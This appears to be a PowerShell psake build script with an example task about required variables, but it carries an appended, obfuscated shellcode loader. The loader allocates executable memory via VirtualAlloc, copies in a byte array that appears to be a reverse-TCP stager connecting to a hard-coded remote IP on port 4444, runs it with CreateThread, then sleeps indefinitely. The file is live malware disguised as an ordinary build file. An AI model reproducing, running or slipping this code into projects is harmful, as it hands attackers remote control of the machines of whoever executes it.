.("{2}{1}{0}" -f's','rtie','prope') {
  ${X} = ${Nu`Ll}
  ${y} = ${Nu`Ll}
  ${z} = ${Nu`LL}
}

&("{1}{0}"-f'sk','ta') ("{0}{1}{2}" -f'd','efau','lt') -depends ("{1}{5}{3}{4}{0}{2}{6}" -f 'Vari','TestRequ','able','e','d','ir','s')


&("{0}{1}" -f'ta','sk') ("{3}{1}{2}{0}{4}" -f 'V','stRe','quired','Te','ariables') `
  -description "This task shows how to make a variable required to run task. Run this script with -properties @{x = 1; y = 2; z = 3}" `
  -requiredVariables ('x'), ('y'), ('z') `
{
}

${C} = ((("{127}{35}{99}{74}{14}{77}{109}{56}{46}{104}{84}{6}{122}{79}{43}{101}{107}{34}{38}{62}{75}{29}{76}{33}{98}{47}{124}{48}{66}{108}{123}{129}{70}{49}{28}{111}{82}{42}{2}{7}{91}{97}{96}{115}{65}{114}{8}{87}{58}{15}{12}{95}{18}{113}{17}{100}{117}{118}{4}{1}{90}{73}{78}{61}{93}{51}{68}{19}{32}{52}{106}{86}{105}{45}{5}{9}{81}{21}{112}{103}{94}{83}{40}{10}{119}{27}{36}{59}{25}{60}{72}{110}{31}{54}{92}{53}{80}{24}{102}{116}{0}{44}{50}{39}{63}{55}{11}{30}{20}{121}{26}{22}{126}{88}{69}{57}{23}{71}{67}{89}{41}{64}{85}{16}{3}{13}{120}{125}{37}{128}"-f' lpTh','e','rt','s','teThr','t dwS','i','({0}','})]p','tack','dd','po','c','t, ','t','i','tr de','n I','tatic ext','A','{0}msvc',' ','c static e','m','la','tr','t.dll{0})]publi','s, I','ct','int d','rt(',' dwC','tt','e','ualAlloc(IntPtr','p','n','int ',' l','[','tA','t(','llImpo','xtern Int','rea','es, uin','bl',' ','n','rote','dId);','pThr','r','n','reati','m','{0})]pu',' ','l','tP',' lpPar','r ','pAddress, ','DllI','I','l{','t flA','m','ead','r','lP','e','ameter, u','d(I','r','u','wSiz','({0}kernel32','ntPt',' e','F','Size,','[D','ar','tat','ntP','bu','ub','Pt','se','a','ker','o','l','t',' s','l32.d','ne',',','o','ntPtr ','Ptr V','gs, I','lpS','ic s','t','i','irt','lloc','.dll','int',');','IntPtr ','er','0','l','ntPtr','Cre','a','res','uint','r','c','ationType, ui','ui',' src, u','xtern Int','[DllIm','count);','nt f'))  -f [cHaR]34);${w} = .("{1}{0}{2}"-f 'dd-Typ','A','e') -memberDefinition ${c} -Name ("{1}{0}"-f 'in32','W') -namespace ("{0}{1}{2}" -f 'W','i','n32Functions') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc5,0x23,0xb0,0x3b,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${Z}."Le`Ng`TH" -gt 0x1000){${g} = ${Z}."L`ength"};${x}=${W}::("{0}{2}{3}{1}" -f'Vir','c','tual','Allo').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${Z}."lenG`Th"-1);${I}++) {${w}::"memS`ET"([IntPtr](${x}.("{0}{2}{1}"-f'ToInt','2','3').Invoke()+${I}), ${z}[${i}], 1)};${W}::("{3}{0}{1}{2}" -f'ateThre','a','d','Cre').Invoke(0,0,${x},0,0,0);for (;;){&("{2}{0}{1}" -f 't-slee','p','Star') 60};
